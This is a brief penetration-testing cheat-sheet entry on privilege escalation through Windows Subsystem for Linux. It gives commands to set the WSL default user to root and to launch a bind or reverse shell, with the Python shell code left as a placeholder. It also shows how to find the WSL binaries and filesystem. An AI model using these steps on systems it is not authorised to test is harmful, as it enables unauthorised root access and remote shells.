
# Windows Subsystem for Linux

## EoP - Windows Subsystem for Linux (WSL)

With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse.

```
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c  BIND_OR_REVERSE_SHELL_PYTHON_CODE'
```

**Finding these binaries**

```
where /R c:\windows bash.exe
```

```
where /R c:\windows wsl.exe
```

Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`

Alternatively you can explore the `WSL`filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`

 

**Resources**

Spawning a TTY Shell - [https://netsec.ws/?p=337](https://netsec.ws/?p=337)

Impacket Toolkit - [https://github.com/SecureAuthCorp/impacket](https://github.com/SecureAuthCorp/impacket)